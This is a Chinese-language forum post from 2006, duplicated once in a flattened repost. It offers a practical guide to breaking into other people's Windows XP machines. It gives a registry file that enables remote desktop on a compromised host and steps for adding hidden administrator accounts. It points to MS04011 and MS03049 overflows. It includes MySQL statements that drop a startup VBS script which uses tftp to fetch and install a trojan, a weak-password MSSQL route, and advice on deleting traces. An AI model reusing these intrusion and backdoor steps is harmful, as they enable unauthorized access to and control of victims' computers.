史萊姆論壇 - 查看單個文章

psac · 2006-01-12, 01:35 PM

入侵XP最新方法

最近論壇中有好多人都在問如何入侵XP。而且還都在用入侵2000的老方法對付XP。這是行不通的。我做了一個總結，看看可以使你對XP有一個清醒的認識，並從中找出一些入侵XP的好的方法。
入侵xp一向來都是很困難,但並不是不能入侵。只是xp的安全性相對於windows其它糸列好些罷了,下面是xp的一些特點:
第一：xp的ipc$命名管道預設是guest用戶權限登入,並且密碼不能為空,可以通過mmc 增加管理單元去修改,充許任何用戶權限登入,但需桌面交互,和獲得管理員權限. (這就是為什麼要開3389的原因)
第二：xp糸統不支持多用戶同時登入,同一時間只能充許一個用戶連接和登入,建義使用 system權限進入xp主機(也就是用溢位,溢位成功後都直接進入system32目錄，或種植木馬),所以通過各種方法入侵xp主機後的第一步並不是增加一個用戶名,而是上傳一個木馬程序更為實際. 因為在沒有開啟終端或模擬終端的情況下,就算你擁有一台xp主機的用戶和密碼, 也沒什麼用。
第三：現在來說說XP的遠端終端連接。xp原有的的遠桌面連接(3389終端),安裝時預設已經安裝和啟動,你只要開啟電腦內容但要遠端連接,還需要更改一下設定,最簡單的方法遠端修改註冊表(這種方法好處在於不用桌面交互),當然你也可以用slave等遠端桌面管理軟體來開啟，但是這樣容易暴露，你的一舉一動都
會在桌面有顯示.下面指出註冊表修改方法:
新增一註冊表文件,內容為:
regedit4 (一定要大寫)

[hkey_local_machine\system\currentcontrolset\control\terminal serve]
"fdenytsconnections"=dword:00000000
假如把上面的註冊表文件存為3389.reg,把3389.reg上傳到肉機執行regedit /s 3389.reg
,這樣就可以遠端連接了。
第四：如果你想像2000那樣映射XP的共享硬碟，要通過修改對方的本機安全原則。在【可匿名訪問的工享】中增加上c$,d$..等。
第五：xp中的模擬終端服務啟動後預設為ntlm驗證,可以用xp原有的的tlntadmn(net start 只能在本機啟動模擬終端服務)指令開啟遠端主機的telnet,而shutdown指令可以關閉遠端主機,sc指令也以組態遠端服務......,這些是xp原有的的小工具 .
第六：另外XP原有的的自動更新和防火牆也為XP增強了一些安全保護。

好了，XP的一些特點介紹完了。現在總結一些入侵XP的具體辦法。
首先我現總結一下我得入侵體會。第一：由於XP不支持管理員權限IPC$連接，所以不能直接在DOS下複製文件。一但進入XP的系統目錄，首先應該在本機主機建立一個FTP伺服器，用來方便快捷的上傳和下載文件。第二：入侵系統後建立帳戶時，不但要把它加入ADMINISTRATORS組，還要把它加入GUESTS組。因為XP的許多限制預設都是都是guest權限的，把它加入了管理員組，無形之中就使這些連接具有了admin權限。切記只是突破XP各種限制的突破口。第三：在後門
的選項上，可以多考慮一下3389。這可是2000所沒有的。你用工具開他的遠端桌面連接，既省掉了木馬被殺的風險，而且可以完全控制對方電腦。第四：好好利用XP的【本機全原則】，其實XP的好多限制都來自這裡，包括用戶和遠端訪問的限制。你一但同過3389遠端登入到對方主機，首先就要更改它的設定。下面舉幾個實例：
【本機安全原則】－【使用者權利指派】－【從網路訪問此電腦】中入"guest"用戶。這樣你就能在本機【執行】中輸入
ip 瀏覽對方共享目錄了。
【本機安全原則】－【使用者權利指派】－【拒絕從網路訪問此電腦】中移除"guest"用戶。
還有很多方法可以為自己提高權限，通過註冊表等等。就看你如何利用了。這裡就不多說了

接著介紹一些入侵XP的方法：
當然溢位還是絕對的主角，他的好處是可以得到"cmdshell"。缺點就是成功率不太高，要有耐心。
對沒打修正檔的XPsp1來說MS04011,MS03049漏洞還是很多的(ms05039主要這對的是2000)。直接溢位，不用在本機開連接阜，溢位成功後用telnet直接登入就行了。
還有就是掃瞄135連接阜，看有沒有rpc溢位，這是比較流行的。工具網上又很多自己去搜吧。
最後是利用資料庫入侵。傳統的是mysql和mssql。前者我沒試過所以找了些資料大家看看吧：
mysql入侵
工具：wineggdropshell v1.35
[1]用mysql連接你擁有用戶名和密碼的遠端mysql數庫.
[2]新增一個資料表後,安格式把下面兩行語句寫到新增的資料表中假如你新增的資料表為aa,
(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");
(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");

[3]把新增的資料表為指令碼文件並匯出到啟動項:
select * from aa into outfile "c:\\docume~1\\alluse~1\\「開始」表單\\程序\\啟動\\aa.vbs";
[4]儲存成功後,只要對方重啟你就可以用木馬登入了

mssql,哈哈不多說了相信大家都聽說過了：
首先掃瞄1433連接阜開放的主機,然後用x-scan中掃瞄mssql弱密碼。再用sqlexec連接帶有弱密碼的主機，接著用tftp上傳木馬，用木馬的system權限登入後,再上傳3389.reg開他的遠端終端。用3389登入後.別忘了冊掉新增的用戶,因為xp登入對話視窗中會把新增的用戶顯示出來.除非你是用的內裝帳戶，或複製的內裝賬戶。

這就是我入侵XP的一些經驗。希望可以為大家提供一些參考。

更新：不要指望在XP上開3389了，雖然可以通過註冊表開啟遠端桌面連接。但是XP只允許一個用戶在同一時間登入。沒辦法更改。網上傳說的修改註冊表的方法：
HKEY鐺OCAL鐸A－CHINE@System@CurrentControlSet@Control@Terminal Server@Licensing Corec分支，新增一個名為「EnableConcurrentSessions」的DWORD值，將鍵值設定為「1」，就可以讓Windows XP支持兩個用戶。

2006-01-12, 01:35 PM	#1
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	入侵XP最新方法入侵XP最新方法最近論壇中有好多人都在問如何入侵XP。而且還都在用入侵2000的老方法對付XP。這是行不通的。我做了一個總結，看看可以使你對XP有一個清醒的認識，並從中找出一些入侵XP的好的方法。入侵xp一向來都是很困難,但並不是不能入侵。只是xp的安全性相對於windows其它糸列好些罷了,下面是xp的一些特點: 第一：xp的ipc$命名管道預設是guest用戶權限登入,並且密碼不能為空,可以通過mmc 增加管理單元去修改,充許任何用戶權限登入,但需桌面交互,和獲得管理員權限. (這就是為什麼要開3389的原因) 第二：xp糸統不支持多用戶同時登入,同一時間只能充許一個用戶連接和登入,建義使用 system權限進入xp主機(也就是用溢位,溢位成功後都直接進入system32目錄，或種植木馬),所以通過各種方法入侵xp主機後的第一步並不是增加一個用戶名,而是上傳一個木馬程序更為實際. 因為在沒有開啟終端或模擬終端的情況下,就算你擁有一台xp主機的用戶和密碼, 也沒什麼用。第三：現在來說說XP的遠端終端連接。xp原有的的遠桌面連接(3389終端),安裝時預設已經安裝和啟動,你只要開啟電腦內容但要遠端連接,還需要更改一下設定,最簡單的方法遠端修改註冊表(這種方法好處在於不用桌面交互),當然你也可以用slave等遠端桌面管理軟體來開啟，但是這樣容易暴露，你的一舉一動都會在桌面有顯示.下面指出註冊表修改方法: 新增一註冊表文件,內容為: regedit4 (一定要大寫) [hkey_local_machine\system\currentcontrolset\control\terminal serve] "fdenytsconnections"=dword:00000000 假如把上面的註冊表文件存為3389.reg,把3389.reg上傳到肉機執行regedit /s 3389.reg ,這樣就可以遠端連接了。第四：如果你想像2000那樣映射XP的共享硬碟，要通過修改對方的本機安全原則。在【可匿名訪問的工享】中增加上c$,d$..等。第五：xp中的模擬終端服務啟動後預設為ntlm驗證,可以用xp原有的的tlntadmn(net start 只能在本機啟動模擬終端服務)指令開啟遠端主機的telnet,而shutdown指令可以關閉遠端主機,sc指令也以組態遠端服務......,這些是xp原有的的小工具 . 第六：另外XP原有的的自動更新和防火牆也為XP增強了一些安全保護。好了，XP的一些特點介紹完了。現在總結一些入侵XP的具體辦法。首先我現總結一下我得入侵體會。第一：由於XP不支持管理員權限IPC$連接，所以不能直接在DOS下複製文件。一但進入XP的系統目錄，首先應該在本機主機建立一個FTP伺服器，用來方便快捷的上傳和下載文件。第二：入侵系統後建立帳戶時，不但要把它加入ADMINISTRATORS組，還要把它加入GUESTS組。因為XP的許多限制預設都是都是guest權限的，把它加入了管理員組，無形之中就使這些連接具有了admin權限。切記只是突破XP各種限制的突破口。第三：在後門的選項上，可以多考慮一下3389。這可是2000所沒有的。你用工具開他的遠端桌面連接，既省掉了木馬被殺的風險，而且可以完全控制對方電腦。第四：好好利用XP的【本機全原則】，其實XP的好多限制都來自這裡，包括用戶和遠端訪問的限制。你一但同過3389遠端登入到對方主機，首先就要更改它的設定。下面舉幾個實例：【本機安全原則】－【使用者權利指派】－【從網路訪問此電腦】中入"guest"用戶。這樣你就能在本機【執行】中輸入 ip 瀏覽對方共享目錄了。【本機安全原則】－【使用者權利指派】－【拒絕從網路訪問此電腦】中移除"guest"用戶。還有很多方法可以為自己提高權限，通過註冊表等等。就看你如何利用了。這裡就不多說了接著介紹一些入侵XP的方法：當然溢位還是絕對的主角，他的好處是可以得到"cmdshell"。缺點就是成功率不太高，要有耐心。對沒打修正檔的XPsp1來說MS04011,MS03049漏洞還是很多的(ms05039主要這對的是2000)。直接溢位，不用在本機開連接阜，溢位成功後用telnet直接登入就行了。還有就是掃瞄135連接阜，看有沒有rpc溢位，這是比較流行的。工具網上又很多自己去搜吧。最後是利用資料庫入侵。傳統的是mysql和mssql。前者我沒試過所以找了些資料大家看看吧： mysql入侵工具：wineggdropshell v1.35 [1]用mysql連接你擁有用戶名和密碼的遠端mysql數庫. [2]新增一個資料表後,安格式把下面兩行語句寫到新增的資料表中假如你新增的資料表為aa, (1)insert into aa values ("set wshshell=createobject (""wscript.shell"")"); (2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)"); [3]把新增的資料表為指令碼文件並匯出到啟動項: select * from aa into outfile "c:\\docume~1\\alluse~1\\「開始」表單\\程序\\啟動\\aa.vbs"; [4]儲存成功後,只要對方重啟你就可以用木馬登入了 mssql,哈哈不多說了相信大家都聽說過了：首先掃瞄1433連接阜開放的主機,然後用x-scan中掃瞄mssql弱密碼。再用sqlexec連接帶有弱密碼的主機，接著用tftp上傳木馬，用木馬的system權限登入後,再上傳3389.reg開他的遠端終端。用3389登入後.別忘了冊掉新增的用戶,因為xp登入對話視窗中會把新增的用戶顯示出來.除非你是用的內裝帳戶，或複製的內裝賬戶。這就是我入侵XP的一些經驗。希望可以為大家提供一些參考。更新：不要指望在XP上開3389了，雖然可以通過註冊表開啟遠端桌面連接。但是XP只允許一個用戶在同一時間登入。沒辦法更改。網上傳說的修改註冊表的方法： HKEY鐺OCAL鐸A－CHINE@System@CurrentControlSet@Control@Terminal Server@Licensing Corec分支，新增一個名為「EnableConcurrentSessions」的DWORD值，將鍵值設定為「1」，就可以讓Windows XP支持兩個用戶。
	__________________
	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次